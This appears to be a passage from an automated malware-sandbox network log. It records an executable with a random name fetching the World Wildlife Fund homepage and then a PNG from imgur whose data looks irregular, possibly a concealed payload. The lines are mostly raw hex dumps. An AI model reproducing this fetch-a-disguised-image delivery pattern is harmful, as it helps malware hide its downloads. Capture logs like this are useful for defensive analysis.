2023-09-05 11:01:21 UTC	46	IN	Data Raw: 74 6f 6d 3a 32 30 70 78 3b 0a 7d 0a 2e 68 6f 6d 65 70 61 67 65 2d 67 6f 61 6c 73 5f 5f 64 65 73 63 72 69 70 74 69 6f 6e 7b 0a 63 6f 6c 6f 72 3a 23 30 30 30 3b 0a 7d 0a 73 65 63 74 69 6f 6e 3e 2e 68 6f 6d 65 70 61 67 65 2d 69 6d 70 61 63 74 7b 0a 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 0a 7d 0a 2e 68 6f 6d 65 70 61 67 65 2d 6c 67 2d 63 61 6d 70 61 69 67 6e 2d 74 65 78 74 2e 2d 74 69 74 6c 65 2d 6c 65 66 74 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 32 30 70 78 3b 0a 7d 0a 2e 68 6f 6d 65 70 61 67 65 2d 6c 67 2d 63 61 6d 70 61 69 67 6e 2d 74 65 78 74 2e 2d 74 69 74 6c 65 2d 6c 65 66 74 2e 2d 68 6f 6d 65 70 61 67 65 2d 74 65 78 74 75 72 65 2d 2d 62 65 69 67 Data Ascii: tom:20px;}.homepage-goals__description{color:#000;}section>.homepage-impact{padding-bottom:20px;}.homepage-lg-campaign-text.-title-left { padding-bottom: 10px;padding-top:120px;}.homepage-lg-campaign-text.-title-left.-homepage-texture--beig
2023-09-05 11:01:21 UTC	48	IN	Data Raw: 61 69 67 6e 2d 74 65 78 74 5f 5f 69 6e 6e 65 72 22 3e 0a 3c 68 32 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 2d 6c 67 2d 63 61 6d 70 61 69 67 6e 2d 74 65 78 74 5f 5f 74 69 74 6c 65 22 3e 0a 4f 75 72 20 77 6f 72 6b 20 69 6e 20 61 63 74 69 6f 6e 0a 3c 2f 68 32 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 2d 6c 67 2d 63 61 6d 70 61 69 67 6e 2d 74 65 78 74 5f 5f 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 0a 44 69 73 63 6f 76 65 72 20 57 6f 72 6c 64 20 57 69 6c 64 6c 69 66 65 20 46 75 6e 64 20 6f 6e 20 74 68 65 20 67 72 6f 75 6e 64 2c 20 61 72 6f 75 6e 64 20 74 68 65 20 77 6f 72 6c 64 2c 20 6d 61 6b 69 6e 67 20 61 20 64 69 66 66 65 72 65 6e 63 65 20 66 6f 72 20 70 65 6f 70 6c 65 20 61 6e 64 20 74 68 65 20 70 6c 61 6e 65 74 2e 0a 3c 2f 70 Data Ascii: aign-text__inner"><h2 class="homepage-lg-campaign-text__title">Our work in action</h2><div class="homepage-lg-campaign-text__content"><p>Discover World Wildlife Fund on the ground, around the world, making a difference for people and the planet.</p
2023-09-05 11:01:21 UTC	49	IN	Data Raw: 35 38 2e 6a 70 67 22 3e 0a 3c 2f 70 69 63 74 75 72 65 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 5f 5f 61 74 74 72 69 62 75 74 69 6f 6e 22 3e 53 68 75 74 74 65 72 73 74 6f 63 6b 20 2f 20 49 67 69 73 68 65 76 61 20 4d 61 72 69 61 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 2d 6e 65 77 73 5f 5f 73 65 63 6f 6e 64 61 72 79 5f 5f 63 6f 6e 74 65 6e 74 22 3e 0a 3c 68 33 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 2d 6e 65 77 73 5f 5f 73 65 63 6f 6e 64 61 72 79 5f 5f 74 69 74 6c 65 22 3e 0a 52 65 75 73 69 6e 67 20 70 6c 61 73 74 69 63 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 2d 63 61 72 65 74 22 3e 26 23 36 35 32 37 39 3b 3c 2f 73 70 61 6e 3e 0a 3c 2f Data Ascii: 58.jpg"></picture><span class="homepage__attribution">Shutterstock / Igisheva Maria</span></div><div class="homepage-news__secondary__content"><h3 class="homepage-news__secondary__title">Reusing plastic<span class="homepage-caret"></span></
2023-09-05 11:01:21 UTC	50	IN	Data Raw: 2f 73 70 61 6e 3e 0a 3c 2f 68 33 3e 0a 3c 70 3e 43 68 61 6d 70 69 6f 6e 69 6e 67 20 74 68 65 20 72 65 73 69 6c 69 65 6e 63 65 20 6f 66 20 77 6f 6d 65 6e 2c 20 63 6f 6d 6d 75 6e 69 74 69 65 73 2c 20 61 6e 64 20 65 63 6f 73 79 73 74 65 6d 73 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 20 69 64 3d 22 61 72 74 69 63 6c 65 5f 62 6c 6f 63 6b 5f 37 34 39 36 62 30 22 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 2d 6e 65 77 73 5f 5f 73 65 63 6f 6e 64 61 72 79 5f 5f 73 74 6f 72 79 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 2d 6e 65 77 73 5f 5f 73 65 63 6f 6e 64 61 72 79 5f 5f 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 73 74 6f 72 Data Ascii: /span></h3><p>Championing the resilience of women, communities, and ecosystems</p></div></a></li><li id="article_block_7496b0" class="homepage-news__secondary__story"><a class="homepage-news__secondary__link" href="https://www.worldwildlife.org/stor
2023-09-05 11:01:21 UTC	52	IN	Data Raw: 30 70 78 29 22 3e 0a 3c 73 6f 75 72 63 65 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 66 69 6c 65 73 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 77 77 66 63 6d 73 70 72 6f 64 2f 69 6d 61 67 65 73 2f 4f 70 70 6f 72 74 75 6e 69 74 79 5f 57 57 66 61 6c 6c 32 30 32 33 2f 31 34 34 30 78 35 38 30 5f 68 61 73 68 2f 32 39 30 39 37 75 72 68 33 30 5f 4f 70 70 6f 72 74 75 6e 69 74 79 5f 57 57 66 61 6c 6c 32 30 32 33 2e 6a 70 67 22 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 34 34 30 70 78 29 22 3e 0a 3c 73 6f 75 72 63 65 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 66 69 6c 65 73 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 77 77 66 63 6d 73 70 72 6f 64 2f 69 6d 61 67 65 73 2f 4f 70 70 6f 72 74 75 6e 69 74 79 Data Ascii: 0px)"><source srcset="https://files.worldwildlife.org/wwfcmsprod/images/Opportunity_WWfall2023/1440x580_hash/29097urh30_Opportunity_WWfall2023.jpg" media="(min-width: 1440px)"><source srcset="https://files.worldwildlife.org/wwfcmsprod/images/Opportunity
2023-09-05 11:01:21 UTC	53	IN	Data Raw: 32 3e 0a 3c 70 3e 0a 41 20 6e 65 77 20 70 72 6f 67 72 61 6d 20 77 69 6c 6c 20 70 72 6f 76 69 64 65 20 74 72 61 69 6e 69 6e 67 2c 20 73 75 70 70 6f 72 74 2c 20 61 6e 64 20 66 69 6e 61 6e 63 69 6e 67 20 74 6f 20 68 65 6c 70 20 77 6f 6d 65 6e 20 66 69 6e 64 20 6e 65 77 20 77 61 79 73 20 74 6f 20 65 61 72 6e 20 69 6e 63 6f 6d 65 20 77 68 69 6c 65 20 63 61 72 69 6e 67 20 66 6f 72 20 74 68 65 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 0a 3c 2f 70 3e 0a 3c 70 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 73 69 6d 70 6c 65 20 68 6f 6d 65 70 61 67 65 2d 62 75 74 74 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 6d 61 67 61 7a 69 6e 65 2f 69 73 73 75 65 73 2f 66 61 6c 6c 2d 32 30 32 33 Data Ascii: 2><p>A new program will provide training, support, and financing to help women find new ways to earn income while caring for the environment</p><p><a class="btn btn-simple homepage-button" href="https://www.worldwildlife.org/magazine/issues/fall-2023
2023-09-05 11:01:21 UTC	54	IN	Data Raw: 65 2d 69 6d 70 61 63 74 5f 5f 6c 69 6e 6b 73 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 73 69 6d 70 6c 65 20 68 6f 6d 65 70 61 67 65 2d 62 75 74 74 6f 6e 20 68 6f 6d 65 70 61 67 65 2d 62 75 74 74 6f 6e 5f 5f 31 20 2d 66 69 6c 6c 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 72 6f 74 65 63 74 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 70 61 67 65 2f 35 32 37 31 36 2f 61 63 74 69 6f 6e 2f 31 3f 65 6e 5f 6f 67 5f 73 6f 75 72 63 65 3d 57 65 62 5f 44 6f 6e 61 74 69 6f 6e 26 61 6d 70 3b 65 61 2e 74 72 61 63 6b 69 6e 67 2e 69 64 3d 57 65 62 5f 48 6f 6d 65 70 61 67 65 26 61 6d 70 3b 73 75 70 70 6f 72 74 65 72 2e 61 70 70 65 61 6c 43 6f 64 65 3d 41 57 45 32 34 30 32 4f 51 32 30 32 33 33 41 30 36 30 37 39 52 58 22 3e 44 Data Ascii: e-impact__links"><a class="btn btn-simple homepage-button homepage-button__1 -filled" href="https://protect.worldwildlife.org/page/52716/action/1?en_og_source=Web_Donation&ea.tracking.id=Web_Homepage&supporter.appealCode=AWE2402OQ20233A06079RX">D
2023-09-05 11:01:21 UTC	59	IN	Data Raw: 5f 5f 74 69 74 6c 65 20 77 77 66 20 68 6f 6d 65 70 61 67 65 5f 5f 68 65 61 64 69 6e 67 20 2d 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 2d 6c 61 72 67 65 22 3e 0a 4a 6f 69 6e 20 6f 75 72 20 63 6f 6d 6d 75 6e 69 74 79 0a 3c 2f 68 32 3e 0a 3c 70 3e 0a 47 65 74 20 74 68 65 20 6c 61 74 65 73 74 20 63 6f 6e 73 65 72 76 61 74 69 6f 6e 20 75 70 64 61 74 65 73 2c 20 62 65 20 69 6e 73 70 69 72 65 64 20 74 6f 20 74 61 6b 65 20 61 63 74 69 6f 6e 2c 20 61 6e 64 20 6c 65 61 72 6e 20 61 62 6f 75 74 20 77 61 79 73 20 74 6f 20 67 65 74 20 69 6e 76 6f 6c 76 65 64 0a 3c 2f 70 3e 0a 3c 70 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 73 69 6d 70 6c 65 20 68 6f 6d 65 70 61 67 65 2d 62 75 74 74 6f 6e 20 2d 68 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a Data Ascii: __title wwf homepage__heading -no-underline -large">Join our community</h2><p>Get the latest conservation updates, be inspired to take action, and learn about ways to get involved</p><p><a class="btn btn-simple homepage-button -hollow" href="https:
2023-09-05 11:01:21 UTC	63	IN	Data Raw: 38 78 35 39 31 32 5f 4d 65 64 69 75 6d 5f 57 57 31 34 37 35 34 31 2e 6a 70 67 22 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 34 34 30 70 78 29 22 3e 0a 3c 73 6f 75 72 63 65 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 66 69 6c 65 73 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 77 77 66 63 6d 73 70 72 6f 64 2f 69 6d 61 67 65 73 2f 4c 61 6e 64 6f 77 6e 65 72 5f 4d 6f 7a 61 6d 62 69 71 75 65 5f 4a 61 6d 65 73 5f 4d 6f 72 67 61 6e 5f 57 57 31 34 37 35 34 31 2f 31 32 30 30 78 34 38 33 5f 68 61 73 68 2f 6a 66 68 66 6e 6d 69 38 5f 4d 65 64 69 75 6d 5f 57 57 31 34 37 35 34 31 2e 6a 70 67 22 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 30 30 70 78 29 22 3e 0a 3c 73 6f 75 72 63 65 20 73 72 63 73 65 74 3d 22 Data Ascii: 8x5912_Medium_WW147541.jpg" media="(min-width: 1440px)"><source srcset="https://files.worldwildlife.org/wwfcmsprod/images/Landowner_Mozambique_James_Morgan_WW147541/1200x483_hash/jfhfnmi8_Medium_WW147541.jpg" media="(min-width: 1200px)"><source srcset="
2023-09-05 11:01:21 UTC	67	IN	Data Raw: 5f 69 6e 5f 74 68 65 5f 59 61 6e 67 74 7a 65 5f 52 69 76 65 72 5f 42 61 73 69 6e 5f 43 68 69 6e 61 2f 34 33 30 78 32 38 37 5f 68 61 73 68 2f 32 6d 78 69 64 38 76 36 30 35 5f 5f 57 57 32 34 33 36 37 30 2e 6a 70 67 22 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 22 3e 0a 3c 73 6f 75 72 63 65 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 66 69 6c 65 73 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 77 77 66 63 6d 73 70 72 6f 64 2f 69 6d 61 67 65 73 2f 54 72 61 64 69 74 69 6f 6e 61 6c 5f 74 65 61 5f 63 65 72 65 6d 6f 6e 79 5f 61 74 5f 48 61 70 70 79 5f 46 61 72 6d 68 6f 75 73 65 5f 49 6e 69 74 69 61 74 69 76 65 5f 61 6e 64 5f 72 75 72 61 6c 5f 77 61 74 65 72 5f 73 65 63 75 72 69 74 79 5f 69 6e 5f 74 68 65 5f 59 Data Ascii: _in_the_Yangtze_River_Basin_China/430x287_hash/2mxid8v605__WW243670.jpg" media="(min-width: 768px)"><source srcset="https://files.worldwildlife.org/wwfcmsprod/images/Traditional_tea_ceremony_at_Happy_Farmhouse_Initiative_and_rural_water_security_in_the_Y
2023-09-05 11:01:21 UTC	71	IN	Data Raw: 22 66 6f 6f 74 65 72 2d 66 6c 65 78 2d 63 6f 6e 74 61 69 6e 65 72 5f 5f 6d 6f 62 69 6c 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 6c 69 73 74 2d 63 61 74 65 67 6f 72 79 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 63 61 74 65 67 6f 72 79 22 3e 44 69 73 63 6f 76 65 72 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 46 6f 6f 74 65 72 20 43 6c 69 63 6b 7c 57 68 6f 20 77 65 20 61 72 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 61 62 6f 75 74 2f 22 3e 57 68 6f 20 77 65 20 61 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d Data Ascii: "footer-flex-container__mobile"><ul class="footer-list-category"><li class="category">Discover</li><li><a data-track-event="Homepages Show\|Footer Click\|Who we are" href="https://www.worldwildlife.org/about/">Who we are</a></li><li><a data-track-event=
2023-09-05 11:01:21 UTC	74	IN	Data Raw: 33 30 63 38 0d 0a 69 76 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 6c 69 73 74 2d 63 61 74 65 67 6f 72 79 20 66 6f 6f 74 65 72 2d 62 72 2d 62 6f 74 74 6f 6d 5f 5f 6d 6f 62 69 6c 65 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 73 6f 63 69 61 6c 2d 63 61 74 65 67 6f 72 79 22 3e 43 6f 6e 6e 65 63 74 20 77 69 74 68 20 75 73 3c 2f 6c 69 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 6e 61 76 2d 73 6f 63 69 61 6c 22 3e 0a 3c 6c 69 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 66 75 6e 64 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 53 6f 63 69 61 6c 20 4f 75 74 62 6f 75 6e 64 Data Ascii: 30c8iv><ul class="footer-list-category footer-br-bottom__mobile"><li class="social-category">Connect with us</li><ul class="footer-nav-social"><li><a href="https://www.facebook.com/worldwildlifefund" data-track-event="Homepages Show\|Social Outbound
2023-09-05 11:01:21 UTC	78	IN	Data Raw: 2e 37 31 2e 36 32 2d 33 2e 33 35 2e 33 32 2d 2e 38 34 2e 37 31 2d 31 2e 34 34 20 31 2e 33 34 2d 32 2e 30 37 61 35 2e 35 38 20 35 2e 35 38 20 30 20 30 31 32 2e 30 37 2d 31 2e 33 34 20 39 2e 39 36 20 39 2e 39 36 20 30 20 30 31 33 2e 33 35 2d 2e 36 32 63 31 2e 39 2d 2e 30 39 20 32 2e 34 36 2d 2e 31 20 37 2e 32 37 2d 2e 31 7a 6d 30 20 35 2e 35 32 61 39 2e 32 34 20 39 2e 32 34 20 30 20 31 30 30 20 31 38 2e 34 38 20 39 2e 32 34 20 39 2e 32 34 20 30 20 30 30 30 2d 31 38 2e 34 38 7a 4d 31 38 20 32 34 61 36 20 36 20 30 20 31 31 30 2d 31 32 20 36 20 36 20 30 20 30 31 30 20 31 32 7a 4d 32 39 2e 37 37 20 38 2e 34 61 32 2e 31 36 20 32 2e 31 36 20 30 20 31 31 2d 34 2e 33 32 20 30 20 32 2e 31 36 20 32 2e 31 36 20 30 20 30 31 34 2e 33 32 20 30 7a 22 20 66 69 6c 6c 3d 22 Data Ascii: .71.62-3.35.32-.84.71-1.44 1.34-2.07a5.58 5.58 0 012.07-1.34 9.96 9.96 0 013.35-.62c1.9-.09 2.46-.1 7.27-.1zm0 5.52a9.24 9.24 0 100 18.48 9.24 9.24 0 000-18.48zM18 24a6 6 0 110-12 6 6 0 010 12zM29.77 8.4a2.16 2.16 0 11-4.32 0 2.16 2.16 0 014.32 0z" fill="
2023-09-05 11:01:21 UTC	83	IN	Data Raw: 73 69 74 65 2d 74 65 72 6d 73 22 3e 53 69 74 65 20 54 65 72 6d 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 63 6f 70 79 72 69 67 68 74 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 46 6f 6f 74 65 72 20 43 6c 69 63 6b 7c 20 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 2f 59 6f 75 72 20 50 72 69 76 61 63 79 20 52 69 67 68 74 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 70 61 67 65 73 2f 70 72 69 76 61 63 79 2d 70 6f 6c 69 63 79 22 3e 20 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 2f 59 6f 75 72 20 50 72 69 76 61 63 79 20 52 69 67 68 74 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 Data Ascii: site-terms">Site Terms</a></li><li><a class="copyright" data-track-event="Homepages Show\|Footer Click\| Privacy Policy/Your Privacy Rights" href="https://www.worldwildlife.org/pages/privacy-policy"> Privacy Policy/Your Privacy Rights</a></li><li><a class
2023-09-05 11:01:21 UTC	87	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49719	199.232.32.193	443	C:\Users\user\Desktop\lJ2eYRm0Bd.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-05 11:01:22 UTC	87	OUT	GET /2lsHcHC.png HTTP/1.1 Connection: Keep-Alive Host: i.imgur.com
2023-09-05 11:01:22 UTC	87	IN	HTTP/1.1 200 OK Connection: close Content-Length: 700022 Content-Type: image/png Last-Modified: Mon, 21 Aug 2023 18:51:45 GMT ETag: "0b2cb14b545e79b0507a81337e2ac265" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: uny_SonXUREQ6MMZRScqsxqq_EUp4VWR0uKSaLa2nyvn3mPYLHtjXw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Tue, 05 Sep 2023 11:01:22 GMT Age: 547 X-Served-By: cache-iad-kiad7000049-IAD, cache-fty21374-FTY X-Cache: Miss from cloudfront, HIT, MISS X-Cache-Hits: 4, 0 X-Timer: S1693911683.577999,VS0,VE26 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2023-09-05 11:01:22 UTC	87	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a7 00 00 02 55 08 02 00 00 00 f5 3f ad 40 00 00 20 00 49 44 41 54 78 9c ec bd 77 98 5b d7 75 e8 bb 71 d0 7b ef bd 0c 06 c0 60 fa 70 1a c9 61 15 3b a9 6e 49 6e 72 62 3b b6 e5 38 71 72 73 f3 ee 1f f7 e5 e5 f9 25 f1 bd 37 f7 4b 9c 6b c7 89 2d d9 96 64 f5 ce 36 ec e4 b0 cc 70 fa 0c 38 0d d3 80 41 ef bd e3 e0 e0 bc 3f 8e 34 99 90 14 25 db 24 4d 4b f8 7d fc f4 01 38 fb ac bd cf c2 9e ad 8d b5 f6 5a 0b 17 8b 46 40 8d 1a 35 6a 7c 6e 80 7e df 03 a8 51 a3 46 8d fb 4a 6d d5 ab 51 a3 c6 e7 8b da aa 57 a3 46 8d cf 17 84 df f7 00 6a 7c 5e 60 1f 13 fc be 87 50 e3 b3 4f ea 48 f4 13 db d4 f6 7a 35 6a d4 f8 7c 51 db eb d5 b8 af e0 ff e8 f7 3d 82 1a 9f 51 90 5f 01 00 00 5f 20 fc c4 73 29 b5 bd 5e 8d 1a 35 3e 5f d4 56 Data Ascii: PNGIHDRU?@ IDATxw[uq{`pa;nInrb;8qrs%7Kk-d6p8A?4%$MK}8ZF@5j\|n~QFJmQWFj\|^`POHz5j\|Q=Q__ s)^5>_V
2023-09-05 11:01:22 UTC	103	IN	Data Raw: c3 e1 76 3f f4 d0 ff fe c7 ff b9 65 eb 56 00 00 99 4c 12 89 44 91 48 94 cb e5 99 4c 66 00 40 43 83 f5 ad 37 df 94 4a a5 34 3a ad c1 da 20 97 2b b6 6c dd 3a 3d 8b 7c d4 3d 00 00 20 00 49 44 41 54 c6 a5 79 ea b5 12 4b 03 09 60 0a 00 63 5a 0d 00 b0 ae 4b 03 b5 12 43 13 92 12 4b 0f d2 a2 4b 93 b5 12 4a 02 b5 45 4b 03 c6 12 26 03 f4 12 3e b3 b5 66 4b 6c b6 ba 57 03 90 12 11 a9 e5 12 49 47 b5 1c 1f 03 b3 37 69 69 b4 01 df 74 dc 7c 2f 6a c7 37 4b 5f e6 6b 38 54 fa 45 7d 03 81 4e 28 6e d1 3c 2e 7b b3 77 7c 51 95 71 26 70 dd 66 26 23 d9 3c 2f 6f d9 d7 7a 56 3e 12 a7 80 59 02 21 07 dd e2 4b 02 b5 12 a3 bd 81 12 4b 03 36 d6 43 8a f0 ee c0 46 95 ee 1b eb 9a 04 4a 04 b1 7a 4b 8b a6 12 4b 88 f8 ee 1a 0b 5d 0c 7a 81 ba 99 1e ff e7 1a a3 11 f2 10 45 8a f0 e2 c8 83 c8 e2 Data Ascii: v?eVLDHLf@C7J4: +l:=\|= IDATyK`cZKCKKJEK&>fKlWIG7iit\|/j7K_k8TE}N(n<.{w\|Qq&pf&#</ozV>Y!KK6CFJzKK]zE
2023-09-05 11:01:22 UTC	119	IN	Data Raw: e3 2a ee 3a 49 e5 fa 0a c9 e6 49 08 39 74 e7 1a 0f e5 78 4e a1 a6 99 4d 13 a7 1f 38 4b 36 28 4b 76 bc 7a 8c 46 49 80 4f 04 35 12 89 89 f0 84 b7 34 b1 e0 48 1f 23 13 43 26 d5 12 1f 23 c1 22 48 ef 80 11 a7 00 3b fe 5f 8a f8 02 4e 0b 0c 37 84 bf 00 00 20 00 49 44 41 54 c5 0f 4b 03 f5 07 4a 01 5d 17 49 eb 16 11 a3 8a f0 40 bf 13 bd 93 aa d3 b5 92 4a 01 51 17 4e 01 51 10 49 56 51 9b 1e f3 b5 91 36 fb b5 67 53 80 c8 12 bf 03 c0 00 c8 7e 45 12 2f 76 b9 c6 42 ea 74 52 4b de b4 66 9e d2 b4 1a 9a 02 16 c8 4a 77 02 11 ab 5d 63 12 59 5d 67 13 5e d1 b4 1d f9 00 c4 1d e1 07 a4 1a 21 a2 b4 66 e9 02 c0 b0 4a e0 97 03 2b 11 b5 f9 04 ae b4 40 48 82 9d 2e a0 37 12 13 48 06 e7 11 9b 43 b5 f9 21 1a 17 13 58 a1 b4 1f 19 00 14 07 0b 8a b2 06 4f 77 f5 30 b7 82 7c d3 23 24 84 33 Data Ascii: *:II9txNM8K6(KvzFIO54H#C&#"H;_N7 IDATKJ]I@JQNQIVQ6gS~E/vBtRKfJw]cY]g^!fJ+@H.7HC!XOw0\|#$3
2023-09-05 11:01:22 UTC	135	IN	Data Raw: a8 38 46 6f 27 a9 ad 49 1a bf a9 8a 58 3e d3 43 80 54 0d cb 0a 66 f1 c0 0f a5 94 c6 07 33 52 09 08 7e 5d 4b 8a bd 67 94 88 70 ad 6b 06 b4 1a 83 c1 bc d3 b2 06 38 06 53 8d 3e da eb 06 f5 17 41 08 7e 13 e9 01 3c 18 c6 4b b4 99 9a 86 f4 1a b1 41 bd 84 c6 17 23 32 45 0b 42 c1 68 83 bd 18 3e c1 72 c9 8b 3d b8 bc 21 9c 00 00 20 00 49 44 41 54 b4 17 78 a3 9b b2 53 3e 71 07 cf 09 b0 91 42 cb d5 19 ce 1f 3b 66 49 03 3e ea c0 09 3e 4e 6f 13 b5 39 80 7a b7 11 86 88 29 11 49 1d d7 21 8e 8a 89 99 37 c9 b0 92 42 17 b7 5f 84 fc 38 55 4a 21 0a d0 5c cb 3e c2 ef 0c 52 97 4b 3f 23 66 50 86 7c 66 5c c1 f5 43 48 76 50 99 83 e1 b7 b2 46 01 3e 37 52 e4 30 e8 3f 43 36 12 b1 fc c0 1c c8 c3 95 99 49 d3 d5 17 c8 3f 23 ed 3f f1 9d 99 83 b9 50 01 a9 e0 a6 06 c5 0c 55 18 c9 01 96 15 Data Ascii: 8Fo'IX>CTf3R~]Kgpk8S>A~<KA#2EBh>r=! IDATxS>qB;fI>>No9z)I!7B_8UJ!\>RK?#fP\|f\CHvPF>7R0?C6I?#?PU
2023-09-05 11:01:22 UTC	151	IN	Data Raw: f6 e1 07 98 10 d7 45 f9 8b e4 fa c3 43 d1 52 41 50 f1 fa 07 63 bc 44 a3 45 76 1b a2 a1 29 53 11 7f 91 42 84 8a c7 52 f9 d6 7d 9b 66 41 e9 d4 8a 25 bf a0 48 93 a1 e8 4a a1 b1 e9 cb 01 15 16 c9 24 93 07 6e 06 9b 41 14 86 e3 97 9f 87 a9 41 cf eb 06 e9 4a 04 37 20 e2 92 b5 c2 cd 02 d5 32 53 33 e5 12 0e 6b 3c 57 27 8a f0 62 c0 d1 f4 d3 2e f4 45 4a c0 56 89 61 0a bf 5c fb 9b 03 4e 13 c6 32 00 00 20 00 49 44 41 54 87 6e 4b 17 a5 11 1f 43 2f 26 d8 f1 83 6e 80 b1 ee e3 38 fb 4a ba 44 86 9e f3 00 3e d4 69 f5 62 ce 12 c0 c4 3f 02 c1 c9 8f 04 4b 76 a9 96 82 77 a1 98 1b 91 b4 d2 4b 55 b4 22 30 c3 b7 72 30 13 31 db 3e e3 8c 69 6a 6b cd 3f 79 78 6f f1 22 f3 a3 1d 3c 78 5c cb dc 91 94 97 30 13 b9 02 2b 67 9f a5 23 67 8f 76 27 67 fe 73 47 b6 a7 61 5c f9 03 29 33 14 25 d5 Data Ascii: ECRAPcDEv)SBR}fA%HJ$nAAJ7 2S3k<W'b.EJVa\N2 IDATnKC/&n8JD>ib?KvwKU"0r01>ijk?yxo"<x\0+g#gv'gsGa\)3%
